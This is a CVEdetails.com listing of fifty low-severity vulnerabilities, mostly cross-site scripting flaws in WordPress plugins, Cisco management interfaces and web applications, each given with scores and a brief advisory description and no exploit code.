CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Security Vulnerabilities (CVSS score between 3 and 3.99)

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
2101 CVE-2019-16330 79 XSS 2019-10-17 2019-10-21
3.5
None Remote Medium ??? None Partial None
In NCH Express Accounts Accounting v7.02, persistent cross site scripting (XSS) exists in Invoices/Sales Orders/Items/Customers/Quotes input field. An authenticated unprivileged user can add/modify the Invoices/Sales Orders/Items/Customers/Quotes fields parameter to inject arbitrary JavaScript.
2102 CVE-2019-16310 79 XSS 2019-09-14 2019-09-16
3.5
None Remote Medium ??? None Partial None
NIUSHOP V1.11 has XSS via the index.php?s=/admin URI.
2103 CVE-2019-16289 79 XSS 2019-09-13 2019-09-16
3.5
None Remote Medium ??? None Partial None
The insert-php (aka Woody ad snippets) plugin before 2.2.8 for WordPress allows authenticated XSS via the winp_item parameter.
2104 CVE-2019-16282 79 XSS 2019-10-14 2019-10-16
3.5
None Remote Medium ??? None Partial None
In NCH Express Invoice v7.12, persistent cross site scripting (XSS) exists via the Invoices/Items/Customers/Quotes input field. An authenticated unprivileged user can add/modify the Invoices/Items/Customers fields parameter to inject arbitrary JavaScript.
2105 CVE-2019-16275 346 DoS 2019-09-12 2020-08-24
3.3
None Local Network Low Not required None None Partial
hostapd before 2.10 and wpa_supplicant before 2.10 allow an incorrect indication of disconnection in certain situations because source address validation is mishandled. This is a denial of service that should have been prevented by PMF (aka management frame protection). The attacker must send a crafted 802.11 frame from a location that is within the 802.11 communications range.
2106 CVE-2019-16268 74 2021-02-03 2021-02-08
3.5
None Remote Medium ??? None Partial None
Zoho ManageEngine Remote Access Plus 10.0.259 allows HTML injection via the Description field on the Admin - User Administration userMgmt.do?actionToCall=ShowUser screen.
2107 CVE-2019-16223 79 XSS 2019-09-11 2021-01-04
3.5
None Remote Medium ??? None Partial None
WordPress before 5.2.3 allows XSS in post previews by authenticated users.
2108 CVE-2019-16216 79 XSS 2019-09-18 2019-09-18
3.5
None Remote Medium ??? None Partial None
Zulip server before 2.0.5 incompletely validated the MIME types of uploaded files. A user who is logged into the server could upload files of certain types to mount a stored cross-site scripting attack on other logged-in users. On a Zulip server using the default local uploads backend, the attack is only effective against browsers lacking support for Content-Security-Policy such as Internet Explorer 11. On a Zulip server using the S3 uploads backend, the attack is confined to the origin of the configured S3 uploads hostname and cannot reach the Zulip server itself.
2109 CVE-2019-16214 Exec Code 2019-09-11 2020-08-24
3.5
None Remote Medium ??? None Partial None
Libra Core before 2019-09-03 has an erroneous regular expression for inline comments, which makes it easier for attackers to interfere with code auditing by using a nonstandard line-break character for a comment. For example, a Move module author can enter the // sequence (which introduces a single-line comment), followed by very brief comment text, the \r character, and code that has security-critical functionality. In many popular environments, this code is displayed on a separate line, and thus a reader may infer that the code is executed. However, the code is NOT executed, because language/compiler/ir_to_bytecode/src/parser.rs allows the comment to continue after the \r character.
2110 CVE-2019-16193 79 XSS 2019-09-11 2019-09-12
3.5
None Remote Medium ??? None Partial None
In ArcGIS Enterprise 10.6.1, a crafted IFRAME element can be used to trigger a Cross Frame Scripting (XFS) attack through the EDIT MY PROFILE feature.
2111 CVE-2019-16178 79 XSS 2019-09-09 2019-09-10
3.5
None Remote Medium ??? None Partial None
A stored cross-site scripting (XSS) vulnerability was found in Limesurvey before 3.17.14 that allows authenticated users with correct permissions to inject arbitrary web script or HTML via titles of admin box buttons on the home page.
2112 CVE-2019-16173 79 XSS 2019-09-09 2019-09-12
3.5
None Remote Medium ??? None Partial None
LimeSurvey before v3.17.14 allows reflected XSS for escalating privileges from a low-privileged account to, for example, SuperAdmin. This occurs in application/core/Survey_Common_Action.php,
2113 CVE-2019-16172 79 XSS 2019-09-09 2019-09-12
3.5
None Remote Medium ??? None Partial None
LimeSurvey before v3.17.14 allows stored XSS for escalating privileges from a low-privileged account to, for example, SuperAdmin. The attack uses a survey group in which the title contains JavaScript that is mishandled upon group deletion.
2114 CVE-2019-16146 79 XSS 2019-09-09 2019-09-10
3.5
None Remote Medium ??? None Partial None
Gophish through 0.8.0 allows XSS via a username.
2115 CVE-2019-16116 532 +Info 2019-10-02 2019-10-10
3.5
None Remote Medium ??? Partial None None
EnterpriseDT CompleteFTP Server prior to version 12.1.3 is vulnerable to information exposure in the Bootstrap.log file. This allows an attacker to obtain the administrator password hash.
2116 CVE-2019-16025 79 Exec Code XSS 2020-09-23 2020-10-05
3.5
None Remote Medium ??? None Partial None
A vulnerability in the web framework of Cisco Emergency Responder could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of some parameters that are passed to the web server of the affected software. An attacker could exploit this vulnerability by persuading a user to access a malicious link or by intercepting a user request for the affected web interface and injecting malicious code into that request. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected web-based management interface or access sensitive, browser-based information.
2117 CVE-2019-16010 79 Exec Code XSS 2020-03-19 2020-03-23
3.5
None Remote Medium ??? None Partial None
A vulnerability in the web UI of the Cisco SD-WAN vManage software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the vManage software. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
2118 CVE-2019-16008 79 Exec Code XSS 2020-01-26 2020-01-29
3.5
None Remote Medium ??? None Partial None
A vulnerability in the web-based GUI of Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based interface of an affected system. The vulnerability is due to insufficient validation of user-supplied input by the web-based GUI of an affected system. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
2119 CVE-2019-15968 79 Exec Code XSS 2019-11-26 2019-12-06
3.5
None Remote Medium ??? None Partial None
A vulnerability in the web-based management interface of Cisco Unified Communications Domain Manager (Unified CDM) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected system. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
2120 CVE-2019-15870 79 XSS 2019-09-03 2019-09-03
3.5
None Remote Medium ??? None Partial None
The CarSpot theme before 2.1.7 for WordPress has stored XSS via the Phone Number field.
2121 CVE-2019-15869 79 XSS 2019-09-03 2019-09-03
3.5
None Remote Medium ??? None Partial None
The JobCareer theme before 2.5.1 for WordPress has stored XSS.
2122 CVE-2019-15837 79 XSS 2019-08-30 2019-09-03
3.5
None Remote Medium ??? None Partial None
The webp-express plugin before 0.14.8 for WordPress has stored XSS.
2123 CVE-2019-15836 79 XSS 2019-08-30 2019-09-04
3.5
None Remote Medium ??? None Partial None
The wp-ultimate-recipe plugin before 3.12.7 for WordPress has stored XSS.
2124 CVE-2019-15830 79 XSS 2019-08-30 2019-09-03
3.5
None Remote Medium ??? None Partial None
The icegram plugin before 1.10.29 for WordPress has ig_cat_list XSS.
2125 CVE-2019-15829 79 XSS 2019-08-30 2019-09-03
3.5
None Remote Medium ??? None Partial None
The photoblocks-grid-gallery plugin before 1.1.33 for WordPress has wp-admin/admin.php?page=photoblocks-edit&id= XSS.
2126 CVE-2019-15827 79 XSS 2019-08-30 2019-09-03
3.5
None Remote Medium ??? None Partial None
The onesignal-free-web-push-notifications plugin before 1.17.8 for WordPress has XSS via the subdomain parameter.
2127 CVE-2019-15814 79 XSS 2019-09-04 2019-09-04
3.5
None Remote Medium ??? None Partial None
Multiple stored XSS vulnerabilities in Sentrifugo 3.2 could allow authenticated users to inject arbitrary web script or HTML.
2128 CVE-2019-15778 79 XSS 2019-08-29 2019-09-03
3.5
None Remote Medium ??? None Partial None
The woo-variation-gallery plugin before 1.1.29 for WordPress has XSS.
2129 CVE-2019-15777 79 XSS 2019-08-29 2019-09-03
3.5
None Remote Medium ??? None Partial None
The shapepress-dsgvo plugin before 2.2.19 for WordPress has wp-admin/admin-ajax.php?action=admin-common-settings&admin_email= XSS.
2130 CVE-2019-15745 798 2019-08-29 2019-09-05
3.3
None Local Network Low Not required Partial None None
The Eques elf smart plug and the mobile app use a hardcoded AES 256 bit key to encrypt the commands and responses between the device and the app. The communication happens over UDP port 27431. An attacker on the local network can use the same key to encrypt and send commands to discover all smart plugs in a network, take over control of a device, and perform actions such as turning it on and off.
2131 CVE-2019-15619 79 XSS 2020-02-04 2020-02-12
3.5
None Remote Medium ??? None Partial None
Improper neutralization of file names, conversation names and board names in Nextcloud Server 16.0.3, Nextcloud Talk 6.0.3 and Nextcloud Deck 0.6.5 causes an XSS when linking them with each others in a project.
2132 CVE-2019-15618 79 XSS 2020-02-04 2020-02-06
3.5
None Remote Medium ??? None Partial None
Missing escaping of HTML in the Updater of Nextcloud 15.0.5 allowed a reflected XSS when starting the updater from a malicious location.
2133 CVE-2019-15615 287 Bypass 2020-02-04 2020-02-13
3.6
None Local Low Not required Partial Partial None
A wrong check for the system time in the Android App 3.9.0 causes a bypass of the lock protection when changing the time of the system to the past.
2134 CVE-2019-15614 79 XSS 2020-02-04 2020-02-12
3.5
None Remote Medium ??? None Partial None
Missing sanitization in the iOS App 2.24.4 causes an XSS when opening malicious HTML files.
2135 CVE-2019-15612 384 2020-02-04 2020-03-24
3.2
None Local Low ??? Partial Partial None
A bug in Nextcloud Server 15.0.2 causes pending 2FA logins to not be correctly expired when the password of the user is reset.
2136 CVE-2019-15607 79 XSS 2020-01-28 2020-01-29
3.5
None Remote Medium ??? None Partial None
A stored XSS vulnerability is present within node-red (version: <= 0.20.7) npm package, which is a visual tool for wiring the Internet of Things. This issue will allow the attacker to steal session cookies, deface web applications, etc.
2137 CVE-2019-15587 79 XSS 2019-10-22 2020-09-17
3.5
None Remote Medium ??? None Partial None
In the Loofah gem for Ruby through v2.3.0 unsanitized JavaScript may occur in sanitized output when a crafted SVG element is republished.
2138 CVE-2019-15508 532 2019-08-23 2019-08-27
3.5
None Remote Medium ??? Partial None None
In Octopus Tentacle versions 3.0.8 to 5.0.0, when a web request proxy is configured, an authenticated user (in certain limited OctopusPrintVariables circumstances) could trigger a deployment that writes the web request proxy password to the deployment log in cleartext. This is fixed in 5.0.1. The fix was back-ported to 4.0.7.
2139 CVE-2019-15507 532 2019-08-23 2019-08-27
3.5
None Remote Medium ??? Partial None None
In Octopus Deploy versions 2018.8.4 to 2019.7.6, when a web request proxy is configured, an authenticated user (in certain limited special-characters circumstances) could trigger a deployment that writes the web request proxy password to the deployment log in cleartext. This is fixed in 2019.7.7. The fix was back-ported to LTS 2019.6.7 as well as LTS 2019.3.8.
2140 CVE-2019-15480 79 XSS 2019-08-23 2019-08-26
3.5
None Remote Medium ??? None Partial None
Domoticz 4.10717 has XSS via item.Name.
2141 CVE-2019-15317 79 XSS 2019-08-22 2019-08-26
3.5
None Remote Medium ??? None Partial None
The give plugin before 2.4.7 for WordPress has XSS via a donor name.
2142 CVE-2019-15314 79 Exec Code XSS 2019-08-22 2019-08-28
3.5
None Remote Medium ??? None Partial None
tiki/tiki-upload_file.php in Tiki 18.4 allows remote attackers to upload JavaScript code that is executed upon visiting a tiki/tiki-download_file.php?display&fileId= URI.
2143 CVE-2019-15281 79 Exec Code XSS 2019-10-16 2019-10-22
3.5
None Remote Medium ??? None Partial None
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The attacker must have valid administrator credentials. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by injecting malicious code into a troubleshooting file. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
2144 CVE-2019-15280 79 Exec Code XSS 2019-10-16 2019-10-22
3.5
None Remote Medium ??? None Partial None
A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by inserting malicious code in certain sections of the interface that are visible to other users. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. An attacker would need valid administrator credentials to exploit this vulnerability.
2145 CVE-2019-15270 79 Exec Code XSS 2019-10-16 2019-10-22
3.5
None Remote Medium ??? None Partial None
A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
2146 CVE-2019-15269 79 Exec Code XSS 2019-10-16 2019-10-22
3.5
None Remote Medium ??? None Partial None
Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
2147 CVE-2019-15268 79 Exec Code XSS 2019-10-16 2019-10-22
3.5
None Remote Medium ??? None Partial None
Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
2148 CVE-2019-15253 79 Exec Code XSS 2020-02-05 2020-05-12
3.5
None Remote Medium ??? None Partial None
A vulnerability in the web-based management interface of Cisco Digital Network Architecture (DNA) Center could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker needs administrator credentials. This vulnerability affects Cisco DNA Center Software releases earlier than 1.3.0.6 and 1.3.1.4.
2149 CVE-2019-15230 79 XSS 2019-08-28 2019-08-30
3.5
None Remote Medium ??? None Partial None
LibreNMS v1.54 has XSS in the Create User, Inventory, Add Device, Notifications, Alert Rule, Create Maintenance, and Alert Template sections of the admin console. This could lead to cookie stealing and other malicious actions. This vulnerability can be exploited with an authenticated account.
2150 CVE-2019-15228 79 XSS 2019-08-20 2019-08-26
3.5
None Remote Medium ??? None Partial None
FUEL CMS 1.4.4 has XSS in the Create Blocks section of the Admin console. This could lead to cookie stealing and other malicious actions. This vulnerability can be exploited with an authenticated account but can also impact unauthenticated visitors.
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.